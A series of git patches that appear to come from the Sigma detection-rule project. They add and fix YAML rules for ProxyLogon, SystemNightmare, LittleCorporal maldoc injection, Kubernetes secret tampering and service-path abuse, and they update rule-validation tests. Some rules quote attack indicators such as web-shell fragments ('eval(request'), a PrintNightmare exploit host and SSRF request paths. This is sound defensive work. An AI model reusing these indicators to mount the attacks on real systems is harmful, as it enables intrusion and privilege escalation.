causing false positives, it can be exempted from the rule. From cc4b3d7d389d8147d4a8dc3668d210492862b646 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 22:07:49 -0500 Subject: [PATCH 0281/1367] Delete gcp_kubernetes_secrets_modified_or_deleted.yml --- ...kubernetes_secrets_modified_or_deleted.yml | 24 ------------------- 1 file changed, 24 deletions(-) delete mode 100644 rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml diff --git a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml deleted file mode 100644 index 8b78f993..00000000 --- a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: Google Cloud Kubernetes Secrets Modified or Deleted -id: 2f0bae2d-bf20-4465-be86-1311addebaa3 -description: Identifies when the Secrets are Modified or Deleted. -author: Austin Songer -status: experimental -date: 2021/08/09 -references: - - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging -logsource: - service: gcp.audit -detection: - selection: - eventName: - - io.k8s.core.v*.secrets.create - - io.k8s.core.v*.secrets.update - - io.k8s.core.v*.secrets.patch - - io.k8s.core.v*.secrets.delete - condition: selection -level: medium -tags: - - attack.credential_access -falsepositives: - - Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From a48fd2135eb86de5a700c0a1cefe0e6f8749ffed Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 22:08:14 -0500 Subject: [PATCH 0282/1367] Create gcp_kubernetes_secrets_modified_or_deleted.yml --- ...kubernetes_secrets_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml diff --git a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml new file mode 100644 index 00000000..8b78f993 --- /dev/null +++ b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Google Cloud Kubernetes Secrets Modified or Deleted +id: 2f0bae2d-bf20-4465-be86-1311addebaa3 +description: Identifies when the Secrets are Modified or Deleted. +author: Austin Songer +status: experimental +date: 2021/08/09 +references: + - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging +logsource: + service: gcp.audit +detection: + selection: + eventName: + - io.k8s.core.v*.secrets.create + - io.k8s.core.v*.secrets.update + - io.k8s.core.v*.secrets.patch + - io.k8s.core.v*.secrets.delete + condition: selection +level: medium +tags: + - attack.credential_access +falsepositives: + - Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 711619e90e03dc939ecc0e4cc7607657f45682e2 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 10 Aug 2021 06:28:35 +0200 Subject: [PATCH 0283/1367] remove 'or' as not need --- rules/cloud/gcp_kubernetes_rolebinding.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp_kubernetes_rolebinding.yml index d920ae69..c6da9214 100644 --- a/rules/cloud/gcp_kubernetes_rolebinding.yml +++ b/rules/cloud/gcp_kubernetes_rolebinding.yml @@ -15,13 +15,13 @@ logsource: detection: selection: eventName: - - io.k8s.authorization.rbac.v*.clusterrolebindings.create or - - io.k8s.authorization.rbac.v*.rolebindings.create or - - io.k8s.authorization.rbac.v*.clusterrolebindings.patch or - - io.k8s.authorization.rbac.v*.rolebindings.patch or - - io.k8s.authorization.rbac.v*.clusterrolebindings.update or + - io.k8s.authorization.rbac.v*.clusterrolebindings.create + - io.k8s.authorization.rbac.v*.rolebindings.create + - io.k8s.authorization.rbac.v*.clusterrolebindings.patch + - io.k8s.authorization.rbac.v*.rolebindings.patch + - io.k8s.authorization.rbac.v*.clusterrolebindings.update - io.k8s.authorization.rbac.v*.rolebindings.update - - io.k8s.authorization.rbac.v*.clusterrolebindings.delete or + - io.k8s.authorization.rbac.v*.clusterrolebindings.delete - io.k8s.authorization.rbac.v*.rolebindings.delete condition: selection level: medium From 17c6fc7038b1bfb2e783ac0263581d55ee4e6c1d Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 10 Aug 2021 09:16:30 +0200 Subject: [PATCH 0284/1367] rule: ProxyLogon rule for MS Exchange --- .../win_exchange_proxylogon_oabvirtualdir.yml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml diff --git a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml new file mode 100644 index 00000000..8dd5846d --- /dev/null +++ b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml @@ -0,0 +1,26 @@ +title: ProxyLogon MSExchange OabVirtualDirectory +id: 550d3350-bb8a-4ff3-9533-2ba533f4a1c0 +status: experimental +description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invokation of Set-OabVirtualDirectory +references: + - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c +author: Florian Roth +date: 2021/08/09 +logsource: + product: windows + service: msexchange-management +detection: + selection_cmdlet: + Message|contains|all: + - 'OabVirtualDirectory' + - ' -ExternalUrl ' + selection_params: + Message|contains: + - 'eval(request' + - 'http://f/ Date: Tue, 10 Aug 2021 10:21:22 +0200 Subject: [PATCH 0285/1367] add test_selection_list_one_value warning only --- tests/test_rules.py | 38 +++++++++++++++++++++++++++++++++++++- 1 file changed, 37 insertions(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 2f1a15dc..80936674 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -499,11 +499,47 @@ class TestRules(unittest.TestCase): def test_invalid_logsource_attributes(self): faulty_rules = [] + valid_logsource = [ + 'category', + 'product', + 'service', + 'definition', + ] for file in self.yield_next_rule_file_path(self.path_to_rules): logsource = self.get_rule_part(file_path=file, part_name="logsource") + valid = True for key in logsource: - if key.lower() not in ['category', 'product', 'service', 'definition']: + if key.lower() not in valid_logsource: print(Fore.RED + "Rule {} has a logsource with an invalid field ({})".format(file, key)) + valide = False + if not valid: + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with non-conform 'logsource' fields. Please check: https://github.com/Neo23x0/sigma/wiki/Rule-Creation-Guide#logsource") + + def test_selection_list_one_value(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + detection = self.get_rule_part(file_path=file, part_name="detection") + if detection: + valid = True + for key in detection: + if isinstance(detection[key],list): + if len(detection[key]) == 1 and not isinstance(detection[key][0],str): #rule with only list of Keywords term + print(Fore.RED + "Rule {} has the selection ({}) with a list of only 1 value in detection".format(file, key)) + valid = False + if isinstance(detection[key],dict): + for sub_key in detection[key]: + if isinstance(detection[key][sub_key],list): #split in 2 if as get a error "int has not len()" + if len(detection[key][sub_key]) == 1: + print (Fore.RED + "Rule {} has the selection ({}/{}) with a list of only 1 value in detection".format(file, key, sub_key)) + valid = False + #if not valid: + # faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 value") + def get_mitre_data(): """ From e098cdf3a104dfacee9732989a97655850628905 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 10 Aug 2021 11:07:28 +0200 Subject: [PATCH 0286/1367] fix url ref --- tests/test_rules.py | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 80936674..81f16d8c 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -281,7 +281,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with malformed optional 'related' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + "There are rules with malformed optional 'related' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification#rule-identification)") def test_sysmon_rule_without_eventid(self): faulty_rules = [] @@ -348,7 +348,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification#status-optional)") def test_level(self): faulty_rules = [] @@ -369,7 +369,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification#level)") def test_optional_fields(self): faulty_rules = [] @@ -495,7 +495,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with non-conform 'title' fields. Please check: https://github.com/Neo23x0/sigma/wiki/Rule-Creation-Guide#title") + "There are rules with non-conform 'title' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#title") def test_invalid_logsource_attributes(self): faulty_rules = [] @@ -516,7 +516,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with non-conform 'logsource' fields. Please check: https://github.com/Neo23x0/sigma/wiki/Rule-Creation-Guide#logsource") + "There are rules with non-conform 'logsource' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#log-source") def test_selection_list_one_value(self): faulty_rules = [] @@ -528,15 +528,15 @@ class TestRules(unittest.TestCase): if isinstance(detection[key],list): if len(detection[key]) == 1 and not isinstance(detection[key][0],str): #rule with only list of Keywords term print(Fore.RED + "Rule {} has the selection ({}) with a list of only 1 value in detection".format(file, key)) - valid = False + #valid = False if isinstance(detection[key],dict): for sub_key in detection[key]: if isinstance(detection[key][sub_key],list): #split in 2 if as get a error "int has not len()" if len(detection[key][sub_key]) == 1: print (Fore.RED + "Rule {} has the selection ({}/{}) with a list of only 1 value in detection".format(file, key, sub_key)) - valid = False - #if not valid: - # faulty_rules.append(file) + #valid = False + if not valid: + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 value") From 1437b1943ae52def4d98745ac54c6b91c2365db0 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 10 Aug 2021 13:09:43 +0200 Subject: [PATCH 0287/1367] add web_cve_2021_26858_iis_rce.yml --- rules/web/web_cve_2021_26858_iis_rce.yml | 25 ++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/web/web_cve_2021_26858_iis_rce.yml diff --git a/rules/web/web_cve_2021_26858_iis_rce.yml b/rules/web/web_cve_2021_26858_iis_rce.yml new file mode 100644 index 00000000..4ce81174 --- /dev/null +++ b/rules/web/web_cve_2021_26858_iis_rce.yml @@ -0,0 +1,25 @@ +title: ProxyLogon Reset Virtual Directories Based On IIS log +id: effee1f6-a932-4297-a81f-acb44064fa3a +status: experimental +description: When exploiting this vulnerability with CVE-2021–26858, an SSRF attack is used to manipulate virtual directories +references: + - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c +author: frack113 +date: 2021/08/10 +logsource: + product: windows + category: webserver + service: iis +detection: + selection: + http_method: 'POST' + http_code: 200 + url_path: '/ecp/DDI/DDIService.svc/SetObject' + Message|contains|all: + - 'schema=Reset' + - 'VirtualDirectory' + Username|endswith: '$' + condition: selection +falsepositives: + - Unlikely +level: critical \ No newline at end of file From 50ccd879044d226ed28f5611a9a3ebaaa42fe525 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 10 Aug 2021 13:16:45 +0200 Subject: [PATCH 0288/1367] fix title --- rules/web/web_cve_2021_26858_iis_rce.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_26858_iis_rce.yml b/rules/web/web_cve_2021_26858_iis_rce.yml index 4ce81174..d053cbe5 100644 --- a/rules/web/web_cve_2021_26858_iis_rce.yml +++ b/rules/web/web_cve_2021_26858_iis_rce.yml @@ -1,4 +1,4 @@ -title: ProxyLogon Reset Virtual Directories Based On IIS log +title: ProxyLogon Reset Virtual Directories Based On IIS Log id: effee1f6-a932-4297-a81f-acb44064fa3a status: experimental description: When exploiting this vulnerability with CVE-2021–26858, an SSRF attack is used to manipulate virtual directories From 1544a351a33f5f178fe13d3ade7bc7fab65715da Mon Sep 17 00:00:00 2001 From: Jon Galarneau Date: Tue, 10 Aug 2021 08:29:39 -0400 Subject: [PATCH 0289/1367] Correcting regex in win_modif_of_services_for_via_commandline.yml The ^ symbol designates the beginning of the string, but in this rule it is clearly intended to be the end of the string. --- .../win_modif_of_services_for_via_commandline.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml b/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml index 970b7c6d..85c78791 100644 --- a/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml +++ b/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml @@ -20,8 +20,8 @@ detection: selection_cmdline_2: CommandLine|re: '(?i)sc failure.*command=.*' selection_cmdline_3: - CommandLine|re: '(?i).*reg add.*(FailureCommand|ImagePath).*(\.sh|\.exe|\.dll|\.bin^|\.bat|\.cmd|\.js|\.msh^|\.reg^|\.scr|\.ps|\.vb|\.jar|\.pl).*' + CommandLine|re: '(?i).*reg add.*(FailureCommand|ImagePath).*(\.sh|\.exe|\.dll|\.bin$|\.bat|\.cmd|\.js|\.msh$|\.reg$|\.scr|\.ps|\.vb|\.jar|\.pl).*' condition: selection_cmdline_1 or selection_cmdline_2 or selection_cmdline_3 falsepositives: - unknown -level: medium \ No newline at end of file +level: medium From 6d869feb4315fd716dce42e3d5f0267a1a9c59ac Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 10 Aug 2021 15:12:45 +0200 Subject: [PATCH 0290/1367] update modified --- .../win_modif_of_services_for_via_commandline.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml b/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml index 85c78791..05ee03d5 100644 --- a/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml +++ b/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml @@ -10,7 +10,7 @@ tags: - attack.t1058 author: Sreeman date: 2020/09/29 -modified: 2021/06/11 +modified: 2021/08/10 logsource: category: process_creation product: windows From 73a4bd74dc987aa6648373de3b27fcbb210de53d Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 10 Aug 2021 17:10:46 +0200 Subject: [PATCH 0291/1367] fix: FPs script exec from temp --- .../process_creation/win_susp_script_exec_from_temp.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_script_exec_from_temp.yml b/rules/windows/process_creation/win_susp_script_exec_from_temp.yml index 58a7ebdc..441139b0 100644 --- a/rules/windows/process_creation/win_susp_script_exec_from_temp.yml +++ b/rules/windows/process_creation/win_susp_script_exec_from_temp.yml @@ -6,6 +6,7 @@ references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ author: Florian Roth, Max Altgelt date: 2021/07/14 +modified: 2021/0810 tags: - attack.execution logsource: @@ -27,7 +28,10 @@ detection: - '%TMP%' - '%LocalAppData%\Temp' filter: - CommandLine|contains: ' >' + CommandLine|contains: + - ' >' + - 'Out-File' + - 'ConvertTo-Json' condition: selection and not filter falsepositives: - Administrative scripts From e43b917dab76c4ca20dd38da14a6b1bde6825b28 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 10 Aug 2021 17:35:32 +0200 Subject: [PATCH 0292/1367] fix space error --- tools/config/winlogbeat-modules-enabled.yml | 70 ++++++++++----------- 1 file changed, 35 insertions(+), 35 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 0736a30f..e43f5ef5 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -508,40 +508,40 @@ fieldmappings: # # Microsoft-Windows-Windows Defender/Operational # - Action ID: winlog.event_data.Action ID - Action Name: winlog.event_data.Action Name - Additional Actions ID: winlog.event_data.Additional Actions ID - Additional Actions String: winlog.event_data.Additional Actions String - Category ID: winlog.event_data.Category ID - Category Name: winlog.event_data.Category Name - Detection ID: winlog.event_data.Detection ID - Detection Time: winlog.event_data.Detection Time - Detection User: winlog.event_data.Detection User - Engine Version: winlog.event_data.Engine Version - Error Code: winlog.event_data.Error Code - Error Description: winlog.event_data.Error Description - Execution ID: winlog.event_data.Execution ID - Execution Name: winlog.event_data.Execution Name + Action ID: winlog.event_data.Action\ ID + Action Name: winlog.event_data.Action\ Name + Additional Actions ID: winlog.event_data.Additional\ Actions\ ID + Additional Actions String: winlog.event_data.Additional\ Actions\ String + Category ID: winlog.event_data.Category\ ID + Category Name: winlog.event_data.Category\ Name + Detection ID: winlog.event_data.Detection\ ID + Detection Time: winlog.event_data.Detection\ Time + Detection User: winlog.event_data.Detection\ User + Engine Version: winlog.event_data.Engine\ Version + Error Code: winlog.event_data.Error\ Code + Error Description: winlog.event_data.Error\ Description + Execution ID: winlog.event_data.Execution\ ID + Execution Name: winlog.event_data.Execution\ Name FWLink: winlog.event_data.FWLink - New Value: winlog.event_data.New Value - Old Value: winlog.event_data.Old Value - Origin ID: winlog.event_data.Origin ID - Origin Name: winlog.event_data.Origin Name + New Value: winlog.event_data.New\ Value + Old Value: winlog.event_data.Old\ Value + Origin ID: winlog.event_data.Origin\ ID + Origin Name: winlog.event_data.Origin\ Name Path: winlog.event_data.Path - Post Clean Status: winlog.event_data.Post Clean Status - Pre Execution Status: winlog.event_data.Pre Execution Status - Process Name: winlog.event_data.Process Name - Product Name: winlog.event_data.Product Name - Product Version: winlog.event_data.Product Version - Remediation User: winlog.event_data.Remediation User - Security intelligence Version: winlog.event_data.Security intelligence Version - Severity ID: winlog.event_data.Severity ID - Severity Name: winlog.event_data.Severity Name - Source ID: winlog.event_data.Source ID - Source Name: winlog.event_data.Source Name - Status Code: winlog.event_data.Status Code - Status Description: winlog.event_data.Status Description - Threat ID: winlog.event_data.Threat ID - Threat Name: winlog.event_data.Threat Name - Type ID: winlog.event_data.Type ID - Type Name: winlog.event_data.Type Name + Post Clean Status: winlog.event_data.Post\ Clean\ Status + Pre Execution Status: winlog.event_data.Pre\ Execution\ Status + Process Name: winlog.event_data.Process\ Name + Product Name: winlog.event_data.Product\ Name + Product Version: winlog.event_data.Product\ Version + Remediation User: winlog.event_data.Remediation\ User + Security intelligence Version: winlog.event_data.Security\ intelligence\ Version + Severity ID: winlog.event_data.Severity\ ID + Severity Name: winlog.event_data.Severity\ Name + Source ID: winlog.event_data.Source\ ID + Source Name: winlog.event_data.Source\ Name + Status Code: winlog.event_data.Status\ Code + Status Description: winlog.event_data.Status\ Description + Threat ID: winlog.event_data.Threat\ ID + Threat Name: winlog.event_data.Threat\ Name + Type ID: winlog.event_data.Type\ ID + Type Name: winlog.event_data.Type\ Name From 63ead346e886ed2e2c8068c8e4d5f15dcbe93ba6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 10 Aug 2021 19:09:34 +0200 Subject: [PATCH 0293/1367] fix modified value --- .../windows/process_creation/win_susp_script_exec_from_temp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_script_exec_from_temp.yml b/rules/windows/process_creation/win_susp_script_exec_from_temp.yml index 441139b0..5389761e 100644 --- a/rules/windows/process_creation/win_susp_script_exec_from_temp.yml +++ b/rules/windows/process_creation/win_susp_script_exec_from_temp.yml @@ -6,7 +6,7 @@ references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ author: Florian Roth, Max Altgelt date: 2021/07/14 -modified: 2021/0810 +modified: 2021/08/10 tags: - attack.execution logsource: From 13c868d3fd1f63134daf951cd586905cf0781aa1 Mon Sep 17 00:00:00 2001 From: Young Date: Tue, 10 Aug 2021 15:34:52 -0700 Subject: [PATCH 0294/1367] Added more helper functions and comments --- tools/sigma/backends/opensearch.py | 139 +++++++++++------------------ 1 file changed, 52 insertions(+), 87 deletions(-) diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index 825caa73..d202e58a 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py @@ -32,78 +32,14 @@ from sigma.config.mapping import ConditionalFieldMapping from .base import BaseBackend, SingleTextQueryBackend from .mixins import RulenameCommentMixin, MultiRuleOutputMixin from .exceptions import NotSupportedError -from .elasticsearch import DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin +from .elasticsearch import ElasticsearchQuerystringBackend from .defaultOpensearchValues import * -class OpenSearchQuerystringBackend(DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin, SingleTextQueryBackend): - """Converts Sigma rule into OpenSearch query string. Only searches, no aggregations.""" - identifier = "es-qs" - active = True - - reEscape = re.compile("([\s+\\-=!(){}\\[\\]^\"~:/]|(? Date: Mon, 9 Aug 2021 13:25:07 +0200 Subject: [PATCH 0295/1367] new rule LittleCorporal generated maldoc process injection --- ...sysmon_littlecorporal_generated_maldoc.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml diff --git a/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml b/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml new file mode 100644 index 00000000..b9b54d10 --- /dev/null +++ b/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml @@ -0,0 +1,25 @@ +title: LittleCorporal Generated Maldoc Injection +id: 7bdde3bf-2a42-4c39-aa31-a92b3e17afac +description: Detects the process injection of a LittleCorporal generated Maldoc. +references: + - https://github.com/connormcgarr/LittleCorporal +status: experimental +author: Christian Burkard +date: 2021/08/09 +logsource: + category: process_access + product: windows +detection: + selection: + SourceImage|endswith: 'winword.exe' + CallTrace|contains|all: + - ':\Windows\Microsoft.NET\Framework64\v2.' + - 'UNKNOWN' + condition: selection +falsepositives: + - unkown +level: high +tags: + - attack.execution + - attack.t1204.002 + - attack.t1055.003 From c1f9c3373039f50b24ab1351a51bab4f41a4b892 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 11 Aug 2021 10:10:30 +0200 Subject: [PATCH 0296/1367] rule: SystemNightmare --- .../win_exploit_systemnightmare.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/process_creation/win_exploit_systemnightmare.yml diff --git a/rules/windows/process_creation/win_exploit_systemnightmare.yml b/rules/windows/process_creation/win_exploit_systemnightmare.yml new file mode 100644 index 00000000..8f4c3727 --- /dev/null +++ b/rules/windows/process_creation/win_exploit_systemnightmare.yml @@ -0,0 +1,24 @@ +title: SystemNightmare Exploitation Script Execution +id: c01f7bd6-0c1d-47aa-9c61-187b91273a16 +status: experimental +description: Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM +references: + - https://github.com/GossiTheDog/SystemNightmare +author: Florian Roth +date: 2021/08/11 +tags: + - attack.privilege_escalation + - attack.t1068 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - 'printnightmare.gentilkiwi.com' + - ' /user:gentilguest ' + - 'Kiwi Legit Printer' + condition: selection +falsepositives: + - Unknown +level: critical From ff5c9116a474c21bc835f872870d52a5dbe277e2 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 11 Aug 2021 11:28:04 +0200 Subject: [PATCH 0297/1367] Update to w3c-logging --- rules/web/web_cve_2021_26858_iis_rce.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/web/web_cve_2021_26858_iis_rce.yml b/rules/web/web_cve_2021_26858_iis_rce.yml index d053cbe5..eaddf371 100644 --- a/rules/web/web_cve_2021_26858_iis_rce.yml +++ b/rules/web/web_cve_2021_26858_iis_rce.yml @@ -9,17 +9,17 @@ date: 2021/08/10 logsource: product: windows category: webserver - service: iis + definition: w3c-logging must be enable https://docs.microsoft.com/en-us/windows/win32/http/w3c-logging detection: selection: - http_method: 'POST' - http_code: 200 - url_path: '/ecp/DDI/DDIService.svc/SetObject' - Message|contains|all: + cs-method: 'POST' + sc-status: 200 + cs-uri-stem|startswith: '/ecp/DDI/DDIService.svc/SetObject' + cs-uri-stem|contains|all: - 'schema=Reset' - 'VirtualDirectory' - Username|endswith: '$' + cs-username|endswith: '$' condition: selection falsepositives: - Unlikely -level: critical \ No newline at end of file +level: critical From 5e5ac8479c003b3bb461b20365088973caecb825 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 11 Aug 2021 14:26:20 +0200 Subject: [PATCH 0298/1367] Add tlp and target Attribute --- tests/test_rules.py | 117 +++++++++++++++++++++++++++--------------- tools/sigma/filter.py | 24 +++++++++ 2 files changed, 100 insertions(+), 41 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 81f16d8c..cc53d85b 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -251,7 +251,7 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'id' fields. Create an id (e.g. here: https://www.uuidgenerator.net/version4) and add it to the reported rule(s).") - + def test_optional_related(self): faulty_rules = [] valid_type = [ @@ -278,11 +278,11 @@ class TestRules(unittest.TestCase): #Only add one time if many bad type in the same file if type_ok == False: print(Fore.YELLOW + "Rule {} has a 'related/type' invalid value.".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with malformed optional 'related' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification#rule-identification)") - + "There are rules with malformed optional 'related' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + def test_sysmon_rule_without_eventid(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): @@ -296,7 +296,7 @@ class TestRules(unittest.TestCase): found = True break if not found: - faulty_rules.append(file) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using sysmon events but with no EventID specified") @@ -310,10 +310,10 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) elif not isinstance(datefield, str): print(Fore.YELLOW + "Rule {} has a malformed 'date' (should be YYYY/MM/DD).".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) elif len(datefield) != 10: print(Fore.YELLOW + "Rule {} has a malformed 'date' (not 10 chars, should be YYYY/MM/DD).".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'date' fields. (create one, e.g. date: 2019/01/14)") @@ -325,10 +325,10 @@ class TestRules(unittest.TestCase): if modifiedfield: if not isinstance(modifiedfield, str): print(Fore.YELLOW + "Rule {} has a malformed 'modified' (should be YYYY/MM/DD).".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) elif len(modifiedfield) != 10: print(Fore.YELLOW + "Rule {} has a malformed 'modified' (not 10 chars, should be YYYY/MM/DD).".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed 'modified' fields. (create one, e.g. date: 2019/01/14)") @@ -346,9 +346,9 @@ class TestRules(unittest.TestCase): if not status_str in valid_status: print(Fore.YELLOW + "Rule {} has a invalide 'status' (check wiki).".format(file)) faulty_rules.append(file) - + self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification#status-optional)") + "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") def test_level(self): faulty_rules = [] @@ -363,13 +363,13 @@ class TestRules(unittest.TestCase): level_str = self.get_rule_part(file_path=file, part_name="level") if not level_str: print(Fore.YELLOW + "Rule {} has no field 'level'.".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) elif not level_str in valid_level: print(Fore.YELLOW + "Rule {} has a invalide 'level' (check wiki).".format(file)) - faulty_rules.append(file) - + faulty_rules.append(file) + self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification#level)") + "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") def test_optional_fields(self): faulty_rules = [] @@ -410,6 +410,41 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed optional 'author' fields. (has to be a string even if it contains many author)") + def test_optional_tlp(self): + faulty_rules = [] 